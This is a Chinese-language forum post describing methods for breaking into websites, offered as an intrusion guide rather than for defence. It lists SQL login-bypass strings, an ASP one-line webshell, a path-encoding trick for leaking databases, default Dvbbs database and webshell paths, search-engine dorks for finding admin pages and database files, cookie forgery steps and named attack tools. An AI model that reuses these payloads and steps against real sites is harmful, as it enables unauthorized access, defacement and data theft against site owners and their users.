无名 发表于 2022-5-8 17:01:21

【LSP】入侵网站的思路


http://cdn.u1.huluxia.com/g4/M03/C4/F8/rBAAdl-O4R6AAR1FAACt4WdlvYs745.jpg
以下是入侵网站常用方法:
1.上传漏洞
如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.
再用
DOMAIN上传. 
2.注入漏洞
字符过滤不严造成的
3.暴库:把二级目录中间的/换成%5c 

   
4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:  ’or’’=’ " or "a"="a   ’) or
(’a’=’a   ") or ("a"="a  or 1=1--
’ or ’a’=’a
5.社会工程学。这个都知道吧。就是猜解。  
6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是
ASP或ASA的后缀)   
7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.
比如:默认数据库,默认后台地址,默认管理员帐号密码等    
8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe 工具:网站猎手 挖掘鸡 明小子
9.查看目录法:一些网站可以断开目录,可以访问目录。
210.37.95.65 images
10.工具溢出

      
11.搜索引擎利用:   (1).inurl:flasher_list.asp  默认数据库:database/flash.mdb  后台/manager/
(2).找网站的管理后台地址: site:xxxx.com intext:管理 site:xxxx.com intitle:管理  〈关键字很多,自已找〉 site:xxxx.com inurl:login
(3).查找access的数据库,mssql、mysql的连接文件 allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
12.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。
13.利用常见的漏洞:如动网BBS
可以先用:dvbbs权限提升工具,使自已成为前台管理员。
THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用
WSockExpert取得Cookies/NC包
这个我就不做了,网上教程多的是,自已下个看看。 工具:dvbbs权限提升工具  动网固顶贴工具
14.还有一些老漏洞。如IIS3,4的查看源码,5的Delete   CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。 http://cdn.u1.huluxia.com/g4/M01/56/3D/rBAAdl9rD7SAGqQQAABWu0i24qQ387.jpg
页: [1]
查看完整版本: 【LSP】入侵网站的思路